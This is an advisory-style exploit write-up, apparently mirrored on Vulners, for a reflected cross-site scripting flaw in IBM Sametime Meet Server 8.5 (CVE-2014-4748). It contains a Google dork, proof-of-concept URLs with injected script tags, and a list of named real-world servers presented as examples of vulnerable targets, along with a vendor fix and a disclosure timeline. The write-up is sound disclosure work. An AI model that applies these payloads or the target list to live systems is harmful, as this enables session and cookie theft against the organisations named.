Vulners
Lucene search
IBM Sametime Meet Server 8.5 Cross Site Scripting
🗓️ 11 Aug 2014 00:00:00Reported by Adriano Marcio MonteiroType 
packetstorm🔗 packetstormsecurity.com👁 27 Views
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
 | CVE-2014-4748 | 26 Jul 201415:00 | – | cve |
 | CVE-2014-4748 | 26 Jul 201415:00 | – | cvelist |
 | EUVD-2014-4667 | 7 Oct 202500:30 | – | euvd |
 | CVE-2014-4748 | 26 Jul 201415:55 | – | nvd |
 | Cross site scripting | 26 Jul 201415:55 | – | prion |
`# Exploit Title: IBM Sametime Meet Server 8.5 Reflect Cross Site Script
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"
# Date: 11/08/2014
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:N/AC:M/Au:N/C:P/I:N/A:N%29
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4748
# OSVDB-ID: http://osvdb.org/109444
#
# Author: Adriano Marcio Monteiro
# E-mail: [email protected]
# Blog: http://www.brazucasecurity.com.br
#
# Vendor: http://www.ibm.com
# Software: http://www.ibm.com/sametime
# Version: 8.5.1
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#
# Test Type: Black Box
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m
Table of Contents
[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography
[0x00] The Vulnerabilty
Reflected Cross Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end users browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page
[0x01] Description
IBM Sametime Classic Meeting Server is vulnerable to reflected cross-site scripting, caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
[0x02] PoC - Proof of Concept
For exploit this vulnerability you only need to submit the crafted URL to victim.
http://sametime02.myserver.com.br/stconf.nsf/WebAttendFrameset?OpenAgent&view=Attend&docID=$DOCID$&meetingID=$MEETID$&join_type=mrc&subject=</title><script>alert('I am a XSS')</script><!--&userLang=pt_BR
http://sametime02.myserver.com.br/stconf.nsf/vwCalendar?OpenView&Grid="><script>alert(' I am a XSS')</script><!--&Date=2014-07-28
Examples:
http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
http://comware.net/stconf.nsf/frmConference?Openform
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
https://mail.dba.uz/stconf.nsf/frmConference?Openform
[0x03] Correction or Workaround
Apply the procedures described in the follow link:
http://www-01.ibm.com/support/docview.wss?uid=swg21679454
[0x04] Timeline
18/07/2014 - Vulnerabilities discovered
19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
23/07/2014 - Advisory and troubleshooting fix published
[0x05] Published
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4748
http://www.securityfocus.com/bid/68841
[0x06] References
OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-264: Permissions, Privileges, and Access Controls
http://cwe.mitre.org/data/definitions/79.html
[0x07] Bibliography
http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent
[end]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Aug 2014 00:00Current
EPSS0.00265